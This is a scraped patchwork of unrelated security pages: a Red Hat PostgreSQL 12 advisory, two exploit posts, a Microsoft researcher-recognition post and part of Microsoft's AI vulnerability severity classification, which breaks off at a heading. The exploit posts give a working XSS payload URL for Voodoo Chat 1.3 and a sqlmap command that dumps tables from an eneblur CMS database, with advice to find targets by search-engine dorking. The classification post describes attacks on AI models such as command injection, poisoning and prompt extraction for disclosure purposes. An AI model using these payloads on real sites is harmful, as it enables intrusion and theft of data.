Red Hat Security Advisory 2023-4535-01 - PostgreSQL is an advanced object-relational database management system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: postgresql:12 security update  
Advisory ID:       RHSA-2023:4535-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4535  
Issue date:        2023-08-08  
CVE Names:         CVE-2022-41862 CVE-2023-2454 CVE-2023-2455   
=====================================================================

1. Summary:

An update for the postgresql:12 module is now available for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

PostgreSQL is an advanced object-relational database management system  
(DBMS).

Security Fix(es):

* postgresql: schema_element defeats protective search_path changes  
(CVE-2023-2454)

* postgresql: row security policies disregard user ID changes after  
inlining. (CVE-2023-2455)

* postgresql: Client memory disclosure when connecting with Kerberos to  
modified server (CVE-2022-41862)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

If the postgresql service is running, it will be automatically restarted  
after installing this update.

5. Bugs fixed (https://bugzilla.redhat.com/):

2165722 - CVE-2022-41862 postgresql: Client memory disclosure when connecting with Kerberos to modified server  
2207568 - CVE-2023-2454 postgresql: schema_element defeats protective search_path changes  
2207569 - CVE-2023-2455 postgresql: row security policies disregard user ID changes after inlining.

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
pg_repack-1.4.6-3.module+el8.5.0+11354+78b3c9c5.src.rpm  
pgaudit-1.4.0-5.module+el8.5.0+11354+78b3c9c5.src.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.5.0+11354+78b3c9c5.src.rpm  
postgresql-12.15-1.module+el8.8.0+19427+d1071523.src.rpm

aarch64:  
pg_repack-1.4.6-3.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
pgaudit-1.4.0-5.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
pgaudit-debuginfo-1.4.0-5.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
pgaudit-debugsource-1.4.0-5.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
postgresql-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-contrib-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-contrib-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-debugsource-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-docs-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-docs-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-plperl-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-plperl-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-plpython3-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-plpython3-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-pltcl-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-pltcl-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-server-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-server-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-server-devel-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-server-devel-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-static-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-test-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-test-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-upgrade-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-upgrade-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-upgrade-devel-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-upgrade-devel-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm

noarch:  
postgresql-test-rpm-macros-12.15-1.module+el8.8.0+19427+d1071523.noarch.rpm

ppc64le:  
pg_repack-1.4.6-3.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
pgaudit-1.4.0-5.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
pgaudit-debuginfo-1.4.0-5.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
pgaudit-debugsource-1.4.0-5.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
postgresql-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-contrib-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-contrib-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-debugsource-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-docs-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-docs-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-plperl-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-plperl-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-plpython3-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-plpython3-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-pltcl-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-pltcl-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-server-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-server-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-server-devel-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-server-devel-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-static-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-test-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-test-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-upgrade-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-upgrade-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-upgrade-devel-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-upgrade-devel-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm

s390x:  
pg_repack-1.4.6-3.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
pgaudit-1.4.0-5.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
pgaudit-debuginfo-1.4.0-5.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
pgaudit-debugsource-1.4.0-5.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
postgresql-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-contrib-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-contrib-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-debugsource-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-docs-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-docs-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-plperl-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-plperl-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-plpython3-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-plpython3-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-pltcl-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-pltcl-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-server-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-server-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-server-devel-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-server-devel-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-static-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-test-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-test-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-upgrade-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-upgrade-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-upgrade-devel-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-upgrade-devel-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm

x86_64:  
pg_repack-1.4.6-3.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
pgaudit-1.4.0-5.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
pgaudit-debuginfo-1.4.0-5.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
pgaudit-debugsource-1.4.0-5.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
postgresql-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-contrib-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-contrib-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-debugsource-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-docs-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-docs-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-plperl-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-plperl-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-plpython3-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-plpython3-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-pltcl-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-pltcl-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-server-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-server-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-server-devel-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-server-devel-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-static-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-test-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-test-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-upgrade-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-upgrade-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-upgrade-devel-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-upgrade-devel-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-41862  
https://access.redhat.com/security/cve/CVE-2023-2454  
https://access.redhat.com/security/cve/CVE-2023-2455  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0k9CAAoJENzjgjWX9erEE1sP+wTqIUW8IoSarpOGvtnKOyF2  
bi5RtyUYPYuhIqaKCK2UsPG3nDm22Icm+BGg4DlyVKm7nDNOEqn9zZ5yVIhhdj6u  
Y3XgfCQ73qIp4S5Kk2/EamjkW+qApav//KwvtYsAKnRSdehnsoPITXyrP6CvNecq  
nDstngk4YXYZmSSWf9+G4qcrW2KYE9ZXb3Y9neDlps+tllMHtCkDll/yovbCsDAl  
TmvUC/rspIlQT0ORUtzbDF6UxbxRNObshQb8eIv/5dEEFi0vhpaBHSEc02qkAmwt  
YEUK6PmOuMnG+t2MmY9qU2JIAWIolhj1mrW+9t0QEtQwnRe3WAdC/u6L6Y8A+Vaq  
su0qGiDIzxucA9GEZaLEwcgFF0oHQGy1bAlosmrfd72J22c1CrGLhUalHX48OC/K  
Uvi1hQjtldMkfjPPcFf1HAQQxdHdmPciYfAGK4cNQtSN2BDTxmXbqZ88MI/K40OZ  
ljQ33r0vAY5JT92wK9H2ywPPua8hvyfwPx3kCRWjkyJRi+pYUlmDMFfnl0bRQPdF  
Kg82S2EgDFm1UJ5+FKQYsG1DiWrpyKn5A2QaNzTdJRSHME7y2AwlrDWyYZs8RRPT  
UMURHrR5A5m0PLrdBTCfHb9HntQ2llqqdzGnD18AcU/gAUBxWfTSR9Xwa9g4QVHQ  
rsj1k41v/v4CYSXYiSOq  
=VOC5  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4535-01

Voodoo Chat version 1.3 suffers from a cross site scripting vulnerability.

**Voodoo Chat 1.3 Cross Site Scripting**

Posted Aug 8, 2023

Authored by indoushka

Voodoo Chat version 1.3 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 11f7a2efbdf14e9500b0a6e971a896bbac171caeed20cc661f2b4ad1b5c02e2e

Download | Favorite | View

**Voodoo Chat 1.3 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Voodoo Chat v1.3 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : http://www.swalif.net/softs/swalif30/softs258256/#post1850068                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /pictures.php?action=add&session=1%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28958119%29%3C/ScRiPt%3E&smile_id=0[+] http://127.0.0.1/groupsyriacom/chat/pictures.php?action=add&session=1%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28958119%29%3C/ScRiPt%3E&smile_id=0Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,913)
*   Arbitrary (16,188)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,273)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,342)
*   DoS (23,412)
*   Encryption (2,369)
*   Exploit (51,815)
*   File Inclusion (4,221)
*   File Upload (972)
*   Firewall (821)
*   Info Disclosure (2,766)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,666)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,747)
*   Root (3,579)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,883)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,359)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,763)
*   Web (9,660)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,921)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,808)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,407)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,704)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,799)
*   UNIX (9,286)
*   UnixWare (186)
*   Windows (6,568)
*   Other

Voodoo Chat 1.3 Cross Site Scripting

eneblur CMS version 1.0 suffers from a remote SQL injection vulnerability.

**eneblur CMS 1.0 SQL Injection**

Posted Aug 8, 2023

Authored by indoushka

eneblur CMS version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | 4d67639c944054e33175ed2e55a36b45439dd449f6e73134fe454cc1d6a7bb71

Download | Favorite | View

**eneblur CMS 1.0 SQL Injection**

    ====================================================================================================================================| # Title     : eneblur CMS 1.0 SQL injection Vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                            | | # Vendor    : https://www.eneblur.com/web-application-development.php                                                            |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /journal_details.php?jid= <===== inject here [+] D:\sqlmap>sqlmap.py -u http://127.0.0.1/wenvirobiotechjournalscom/journal_details.php?jid=3 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --tables -D envirobi_portal_server3Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,913)
*   Arbitrary (16,188)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,273)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,342)
*   DoS (23,412)
*   Encryption (2,369)
*   Exploit (51,815)
*   File Inclusion (4,221)
*   File Upload (972)
*   Firewall (821)
*   Info Disclosure (2,766)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,666)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,747)
*   Root (3,579)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,883)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,359)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,763)
*   Web (9,660)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,921)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,808)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,407)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,704)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,799)
*   UNIX (9,286)
*   UnixWare (186)
*   Windows (6,568)
*   Other

eneblur CMS 1.0 SQL Injection

The Microsoft Researcher Recognition Program offers public thanks and recognition to security researchers who help protect our customers through discovering and sharing security vulnerabilities under Coordinated Vulnerability Disclosure.
Today, we are excited to recognize this year’s top 100 Most Valuable Researchers (MVRs) based on the total number of points earned for each valid report.

The Microsoft Researcher Recognition Program offers public thanks and recognition to security researchers who help protect our customers through discovering and sharing security vulnerabilities under Coordinated Vulnerability Disclosure.

Today, we are excited to recognize this year’s top 100 Most Valuable Researchers (MVRs) based on the total number of points earned for each valid report. Congratulations to each of our MSRC 2023 Most Valuable Researchers! Check out the full list of researchers recognized this year here.

This list recognizes researchers who submitted valid vulnerabilities between July 1, 2022, and June 30, 2023, and earned the most points. This year in addition to the top 100, we have also included all researchers who have earned points through their vulnerability submissions this recognition period. We thank you for your partnership and look forward to seeing you climb in the ranks! To learn more about our program scope and how to earn points for each valid vulnerability, check out our program page.

In addition to our top 100 leaderboard, our annual technology area-specific leaderboards recognize researchers who have submitted high-impact vulnerabilities in particular product areas.

Congratulations to the top Azure researchers this year: **goodbyeselene, Zhiyi Zhang, Anonymous!**

Congratulations to the top Office researchers this year: **Mat Powell working with Trend Micro Zero Day Initiative, zcgonvh, Rocco Calvi (@TecR0c)!**

Congratulations to the top Windows researchers this year: **Yuki Chen, Jarvis\_1oop, Wh1tc & Zhiniang Peng!**

Congratulations to the top Dynamics 365 researchers this year: **Erik Donker @kire\_devs\_hacks, batram, Abdullah (@xmrdoel)!**

In addition to MVR status, researchers are awarded badges to represent the following achievements:

Our 2023 Top 100 MVRs will receive an MSRC swag box and digital badges to share their accomplishments on social media and professional portfolios. Researchers will be receiving an email from msrcmvr@microsoft.com in the coming month to claim their swag and badges.

Congratulations to each of the researchers recognized and thank you for continuing to partner with us to secure customers. We’re excited to see what you do in the next year!

_Madeline Eckert, MSRC_

Congratulations to the MSRC 2023 Most Valuable Security Researchers!

The Microsoft Security Response Center (MSRC) is always looking for ways to provide clarity and transparency around how we assess the impact of vulnerabilities reported in our products and services. To this end, we are announcing the Microsoft Vulnerability Severity Classification for AI Systems, an update to Microsoft’s existing vulnerability severity classification (i.

The Microsoft Security Response Center (MSRC) is always looking for ways to provide clarity and transparency around how we assess the impact of vulnerabilities reported in our products and services. To this end, we are announcing the Microsoft Vulnerability Severity Classification for AI Systems, an update to Microsoft’s existing vulnerability severity classification (i.e., our “bug bar”) to cover new vulnerability categories arising specifically from the use of AI in our products and services.

The aim of this update is to provide a common framework for external researchers and Microsoft security engineering teams to discuss the impact of vulnerability submissions, with more detail than previous guides.

**New Vulnerability Categories New Vulnerability Categories**

We are introducing three new top-level categories, each of which contains one or more AI-specific vulnerability types\*.

**1\. Inference Manipulation 1\. Inference Manipulation**

This category consists of vulnerabilities that could be exploited to manipulate an AI model’s response to individual inference requests, but do not modify the model itself. There are two new vulnerability types in this category: command injection and input perturbation.

**Command injection** is the ability to inject instructions that cause the model to deviate from its intended behavior. This is somewhat similar to the concept of “prompt injection” but we wanted to make it clear that the ability to inject (part of) a prompt is not in itself a vulnerability – it only becomes a vulnerability if the injected prompt is able to substantially change the behavior of the model. For example, injecting irrelevant information is not a vulnerability, whereas injecting a command/instruction that causes the model to perform a completely different task is a vulnerability. On the other hand, command injection is broader than prompt injection because the injected commands need not necessarily be textual input – they could be any type of command that causes the model to deviate from its intended behavior (e.g., specially crafted images in the case of multi-modal models).

**Input perturbation** is the ability to perturb valid inputs such that the model produces incorrect outputs. This is also sometimes referred to as evasion or adversarial examples, and mainly applies to decision-making systems. This is not the same as simply finding examples of incorrect outputs – in order to qualify as a security vulnerability, there must be a clear perturbation of valid inputs that consistently leads to incorrect outputs and has a demonstrable security impact.

The severity of vulnerabilities in this category depends on how the manipulated response is used in the specific product or service. If the potential impact of the vulnerability is limited to the attacker themselves (i.e., a manipulated response is only shown to the attacker), we do not currently consider this to be an in-scope vulnerability. We assign higher severity if the manipulated response is directly shown to other users or used to make decisions that affect other users (e.g., cross-domain command injection).

**2\. Model Manipulation 2\. Model Manipulation**

This category consists of vulnerabilities that could be exploited to manipulate a model during the training phase. There are two new vulnerability types in this category, model poisoning and data poisoning, both of which involve manipulating the model during training.

**Model poisoning** is the ability to poison the trained model by tampering with the model architecture, training code, or hyperparameters.

**Data poisoning** is similar to model poisoning, but involves modifying the data on which the model is trained before training takes place.

To qualify as either of the above vulnerability types, there must be a demonstrable impact on the final model, which would not have been present without the poisoning. For example, the ability to insert backdoors into a model during training would be assessed as poisoning if it could be demonstrated that these backdoors persist into the final model, and could be triggered by specific inputs at inference time. The severity of vulnerabilities in this category depends on how the impacted model is used. Similarly to the inference manipulation category above, model manipulation vulnerabilities that affect only the attacker are not currently in scope, whereas those that could affect other users are assigned higher severity.

**3\. Inferential Information Disclosure 3\. Inferential Information Disclosure**

This category consists of vulnerabilities that could be exploited to _infer_ information about the model’s training data, architecture and weights, or inference-time input data. This is similar to the existing Information Disclosure category, but differs in how the information is obtained. Whereas Information Disclosure vulnerabilities directly reveal the impacted data, Inferential Information Disclosure vulnerabilities permit something to be inferred about the impacted data.

There are several new vulnerability types in this category, each considering a different attacker goal. These include inferring whether a particular data record was used during training (**membership inference**), inferring sensitive attributes of a training data record (**attribute inference**), or inferring properties of the training data (**property inference**). Another type of vulnerability in this category covers inferring information about the model itself, such as its architecture or weights, based on interactions with the model (**model stealing**). The final vulnerability types in this category deal with extracting a model’s system prompt (**prompt extraction**) or information about another user’s inputs (**input extraction**).

The vulnerabilities in this category are evaluated in terms of the level of confidence/accuracy attainable by a potential attacker, and are only applicable if an attacker can obtain a sufficient level of confidence/accuracy. In all cases, the severity depends on the classification of the impacted data (e.g., the training data, model weights, or system prompt). We use the same data classification as the recently published Microsoft Vulnerability Severity Classification for Online Services.

**Complementing Existing Vulnerability Categories Complementing Existing Vulnerability Categories**

It is important to note that this is an _update_ to our existing vulnerability severity classification, not a stand-alone list of all vulnerabilities that could affect AI systems. In fact, many of the vulnerabilities that could arise in AI systems are already covered by our existing severity classification. For example, directly stealing the weights of a trained model through a storage account misconfiguration is covered by the existing Information Disclosure category. Directly modifying the stored weights of a trained model is an example of Tampering. Vulnerabilities that cause the model to respond slowly are covered by the existing Denial of Service category.

**Out of Scope Vulnerability Types Out of Scope Vulnerability Types**

In a small number of rows, we have indicated that a specific scenario is “Not in scope”. This is usually the case when the impact is limited to the attacker themselves (e.g., a manipulated response that is only shown to the attacker). This is not to say that these scenarios are not relevant. Indeed we encourage researchers to report them directly to the affected product or service, via their respective feedback channels, similarly to other non-security bugs.

**Relationship with Other Taxonomies Relationship with Other Taxonomies**

